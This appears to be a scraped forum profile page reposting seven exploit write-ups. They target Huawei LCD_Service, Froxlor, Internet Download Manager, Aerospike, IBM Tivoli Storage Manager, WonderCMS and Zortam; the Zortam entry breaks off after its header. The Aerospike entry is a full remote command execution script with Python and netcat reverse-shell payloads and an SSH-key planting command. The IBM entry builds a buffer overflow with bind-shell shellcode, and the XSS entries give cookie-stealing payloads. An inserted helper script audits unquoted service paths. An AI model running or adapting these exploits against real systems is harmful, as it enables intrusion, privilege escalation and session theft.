
HireHackking


Everything posted by HireHackking

  1. # Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
# Date: 2020-11-07
# Exploit Author: Gerardo González
# Vendor Homepage: https://consumer.huawei.com/mx
# Software Link: https://consumer.huawei.com/mx
# Version: 1.0.1.0
# Tested on: Windows 10 Home Single Language x64 Esp

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

# Service info:

Huawei LCD_Service    LCD_Service    C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe    Auto

C:\Users\gerar>sc qc "LCD_Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LCD_Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Huawei LCD_Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
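An added audit helper (not part of the original post) that applies the same unquoted-path check as the wmic/findstr chain above to a set of service records and derives the quoted binary path an administrator would set to remediate the finding; the service records are constructed sample data, only the first row comes from the advisory.

```python
import re

# Constructed sample records with the same columns as the wmic query in the post:
# (Name, DisplayName, PathName, StartMode). Only the first row is taken from the
# advisory; the others are made up to exercise the edge cases of the check.
SAMPLE_SERVICES = [
    ("LCD_Service", "Huawei LCD_Service",
     r"C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe", "Auto"),
    ("QuotedSvc", "Properly quoted path",
     r'"C:\Program Files\Example Corp\svc.exe" -run', "Auto"),
    ("NoSpaceSvc", "No spaces before the executable",
     r"C:\Vendor\tool\service.exe --daemon", "Auto"),
    ("ArgSpaceSvc", "Spaces only in the arguments",
     r"C:\Vendor\svc.exe -config C:\Program Files\Vendor\cfg.ini", "Auto"),
    ("wuauserv", "Windows Update",
     r"C:\Windows\system32\svchost.exe -k netsvcs -p", "Manual"),
]

_EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def executable_portion(pathname):
    """Return the command line up to and including the first '.exe'.

    The service control manager resolves an unquoted path left to right, so only
    spaces that occur before the executable name are ambiguous; spaces inside the
    trailing arguments are harmless.
    """
    m = _EXE_RE.search(pathname)
    return pathname[:m.end()] if m else pathname


def is_unquoted_with_spaces(pathname):
    """True when the binary path is not wrapped in double quotes and the part that
    precedes the executable name contains a space (the pattern the advisory reports)."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    return " " in executable_portion(p)


def quoted_binpath(pathname):
    """Build the remediated command line: the executable wrapped in double quotes,
    with any trailing arguments preserved. This is the value an administrator sets
    as the service binary path (sc config <name> binPath= "...") to close the finding."""
    p = pathname.strip()
    exe = executable_portion(p)
    return '"%s"%s' % (exe, p[len(exe):])


def find_unquoted_services(records, auto_start_only=True, skip_windows_dir=True):
    """Return (name, original_path, remediated_path) for each record that matches.

    The two filters reproduce the findstr chain in the post: keep auto-start
    services and drop anything that lives under C:\\Windows\\.
    """
    findings = []
    for name, _display, pathname, startmode in records:
        if auto_start_only and startmode.strip().lower() != "auto":
            continue
        if skip_windows_dir and pathname.strip().lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(pathname):
            findings.append((name, pathname, quoted_binpath(pathname)))
    return findings


if __name__ == "__main__":
    for name, path, fixed in find_unquoted_services(SAMPLE_SERVICES):
        print("[!] %s\n    current : %s\n    fixed   : %s" % (name, path, fixed))
```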
  2. # Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-12
# Vendor Homepage: https://froxlor.org/
# Software Link: https://froxlor.org/download/
# Version: 0.10.16

Document Title:
===============
Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2241

Release Date:
=============
2020-11-12

Vulnerability Laboratory ID (VL-ID):
====================================
2241

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Froxlor Server Management Panel, the lightweight server management software for your needs. Developed by experienced server administrators, this open source (GPL) panel simplifies the effort of managing your hosting. Manage reseller resources and limit what the customers may use in the dedicated customer panel. MySQL management, Directory protection & settings management.

(Copy of the Homepage: https://froxlor.org/index.php & https://froxlor.org/download/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Froxlor Server Management Panel v0.10.16.

Affected Product(s):
====================
Froxlor Team
Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel)
Affected Packages: Gentoo, Debian & Ubuntu

Vulnerability Disclosure Timeline:
==================================
2020-05-01: Researcher Notification & Coordination (Security Researcher)
2020-05-02: Vendor Notification (Security Department)
2020-05-13: Vendor Response/Feedback (Security Department)
2020-10-12: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Froxlor Server Management Panel v0.10.16 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The persistent cross site web vulnerability is located in the `username`, `name` and `firstname` input fields of the customer add or registration module.
Remote attackers are able to add customers with malicious script code as firstname or name to manipulate in the backend the `admin_customers.php` and `customers.php` files.
The injection point is the registration or customer add/edit module and the execution occurs on preview of the traffic module in the admin backend.
The request method to inject is POST and the attack vector is persistent, located on the application-side.

In a valid attack case the remote attacker uses a customer or reseller account to inject the payload as name to provoke an execute in the insecure backend module.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] Username
[+] Name
[+] Firstname

Vulnerable Module(s):
[+] Customers

Vulnerable Parameter(s):
[+] name
[+] firstname

Affected File(s):
[+] admin_customers.php

Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote attackers with a low privilege user account and with low user interaction.
For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register or login with a low privilege user account
2. Open the profile account section
3. Change the name and firstname or include in the registration process
Note: Inject test payload to vulnerable marked input fields
4. Save or submit the input via form
5. Wait until an admin or higher privileged user role opens the traffic stats to execute
6. Successful reproduce of the persistent input validation web vulnerability!

PoC: Payload (Exploitation)
test%20>"<script alert(document.cookie)></script>div style=1

PoC: Vulnerable Sources (Execution Points)
[admin_customers.php or customers.php to admin_traffic.php via Name & Firstname]
<tr role="row">
<td>>">test%20>"<script alert(document.cookie)></script>div style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]&nbsp;
<a href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2" rel="external" target="_blank">[Details]</a></td>
<td><small>-</small></td>
</tr><tr role="row">

--- PoC Session Logs [POST] --- (Reseller Account to Admin)
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20
Host: froxlor.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 879
Origin: https://froxlor.localhost:8080
Connection: keep-alive
Referer: https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add
Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo
s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send&
new_loginname=test1%20>"<script alert(document.cookie)></script>div style=1&createstdsubdomain=0,1&
store_defaultindex=0,1&new_customer_password=KwhyqgzvPo&
new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1&
name=btest%20>"<script alert(document.cookie)></script>div style=1&
firstname=ctest%20>"<script alert(document.cookie)></script>div style=1&gender=0&
company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=&
custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0&
email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1&
perlenabled=0&dnsenabled=0&logviewenabled=0
-
POST: HTTP/2.0 200 OK
server: Apache
vary: Accept-Encoding
content-encoding: gzip
content-length: 1393
content-type: text/html; charset=UTF-8

Reference(s):
https://froxlor.localhost:8080/
https://froxlor.localhost:8080/admin_traffic.php
https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers

Solution - Fix & Patch:
=======================
The vulnerability can be patched by following the next steps ...
1. Validate and escape the content of the vulnerable username, name and firstname input fields
2. Restrict the input fields and disallow special chars on inputs to filter
3. Parse the two output locations and escape or securely encode the content
4. Encode in the edit form the results on check

Security Risk:
==============
The security risk of the persistent validation web vulnerability in the web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
  3. # Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
# Date: November 18, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: http://www.internetdownloadmanager.com/
# Software Link: http://www.internetdownloadmanager.com/download.html
# Version: 6.38.12
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041

# Steps to reproduce crash:
# 1) Execute provided Perl code
# 2) Open IDMan_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Internet Download Manager 6.38
# 5) From the Menu bar -> Downloads -> Scheduler
# 6) Check the box for 'Open the following file when done:'
# 7) Paste the contents of IDMan_Crash.txt into the input field below
# 8) Click 'Apply' and observe the crash

#!/usr/bin/perl

$baddata  = "\x41" x 1302;
$baddata .= "\x42" x 2;                      # this length overwrites NSEH on Windows 7 Pro SP 1
$baddata .= "\x43" x (5000 - length($baddata));

$file = "IDMan_Crash.txt";
open (FILE, '>IDMan_Crash.txt');
print FILE $baddata;
close (FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
  4. # Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151

#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string

# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev

PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'


def _get_client(cfg):
    try:
        return aerospike.client({
            'hosts': [(cfg.ahost, cfg.aport)],
            'policies': {'timeout': 8000}}).connect()
    except Exception as e:
        print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")


def _send(client, cfg, _cmd):
    try:
        print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring), 'poc', 'runCMD', [_cmd]))
    except Exception as e:
        print(f"[-] UDF execution returned {e.msg}")


def _register_udf(client, cfg):
    try:
        client.udf_put(cfg.udfpath)
    except Exception as e:
        print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
        raise e


def _random_string(l):
    return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])


def _populate_table(client, cfg):
    ns = cfg.namespace
    setname = cfg.setname
    print(f"[+] writing to {ns}.{setname}")
    try:
        rec = cfg.dummystring
        client.put((ns, setname, rec), {'pk': cfg.dummystring})
        print(f"[+] wrote {rec}")
    except Exception as e:
        print(f"[-] unable to write record: {e.msg}")
        try:
            if e.msg.startswith('Invalid namespace'):
                print("Valid namespaces: ")
                for n in _info_parse("namespaces", client).split(";"):
                    print(n.strip())
        except:
            pass
        sys.exit(13)


def _info_parse(k, client):
    try:
        return [i[1] for i in client.info_all(k).values()][0]
    except Exception as e:
        print(f"error retrieving information: {e.msg}")
        return []


def _is_vuln(_mj, _mi, _pt, _bd):
    fixed = [5, 1, 0, 0]
    found = [_mj, _mi, _pt, _bd]
    if fixed == found:
        return False
    for ix, val in enumerate(found):
        if val < fixed[ix]:
            return True
        elif val == fixed[ix]:
            pass
        else:
            return False


def _version_check(client):
    print("[+] aerospike build info: ", end="")
    try:
        _ver = _info_parse("build", client)
        print(_ver)
        mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
        if _is_vuln(mj, mi, pt, bd):
            print("[+] looks vulnerable")
            return
        else:
            print(f"[-] this instance is patched.")
            sys.exit(0)
    except Exception as e:
        print(f"[+] unable to interpret build number due to {e}")
        print("[+] continuing anyway... ")


def _exploit(cfg):
    client = _get_client(cfg)
    if not client:
        return
    _version_check(client)
    print(f"[+] populating dummy table.")
    _populate_table(client, cfg)
    print(f"[+] registering udf")
    _register_udf(client, cfg)
    if cfg.pythonshell or cfg.netcatshell:
        sys.stdout.flush()
        print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
        sys.stdout.flush()
        for i in range(4):
            print(".", end="")
            sys.stdout.flush()
            sleep(1)
        print(".")
        _send(client, cfg,
              PYTHONSHELL.format(ip=cfg.lhost, port=cfg.lport) if cfg.pythonshell
              else NETCATSHELL.format(ip=cfg.lhost, port=cfg.lport))
    if cfg.cmd:
        print(f"[+] issuing command \"{cfg.cmd}\"")
        _send(client, cfg, cfg.cmd)


if __name__ == '__main__':
    if len(sys.argv) == 1:
        print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
        print("... or ... ")
        print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
        sys.exit(0)

    parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
    parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
    parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
    parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
    parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
    parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
    parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
    parser.add_argument("--lhost", help="host to use for reverse shell callback")
    parser.add_argument("--lport", help="port to use for reverse shell callback")
    parser.add_argument("--cmd", help="custom command to issue against the underlying host")
    parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
    cfg = parser.parse_args()

    if not cfg.setname:
        cfg.setname = 'cve202013151'
    if not cfg.dummystring:
        cfg.dummystring = _random_string(16)
    if not cfg.udfpath:
        cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')

    assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
    if cfg.pythonshell or cfg.netcatshell:
        assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"

    _exploit(cfg)
  5. # Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

"""
Usage:
IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"

PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"

FileName         : dsmadmc.exe
ARCH             : I386
DotNET           : False
ASLR             : True
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : False
ControlFlowGuard : False
HighentropyVA    : False
"""

# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
#                   ^_ESP

"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

#!/usr/bin/python
import struct

# 4000 bytes
buff_max_length = 800
eip_offset = 68

"""
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
GOOD CHARS: asciiprint \x20-\x7e
MOD CHARS: \x00 -> \x20

    ,-----------------------------------------------.
    | Comparison results:                           |
    |-----------------------------------------------|
    |                        80 81 82 83 84 85 86 87| File
    |                        3f 3f 2c 9f 2c 2e 2b d8| Memory
 80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
    |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
 90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
    |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
 a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
    |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
 b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
    |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
 c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
    |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
 d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
    |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
 e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
    |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
 f0 |f8 f9 fa fb fc fd fe ff                        | File
    |6f 97 a3 96 81 79 5f 98                        | Memory
    `-----------------------------------------------'
"""

# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"

buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I", 0x02c73d7b)  # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))

print("Writing {} bytes".format(len(buff)))
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()
  6. # Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
# Date: 20-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29233

Stored Cross-site scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Attack vector:
This vulnerability allows an attacker to inject the XSS payload in Page description and each time any user visits the website, the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

Vulnerable Parameters: Page description.

Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Page description:
"hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.

POST /demo/ HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 196
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/demo/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925

fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
  7. # Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041

# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click 'OK' when prompted 'Do you want to create a new Mp3 library?'
# 7) Paste the contents of Zortam_Crash.txt into the 'Select Folder' field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80

#!/usr/bin/perl

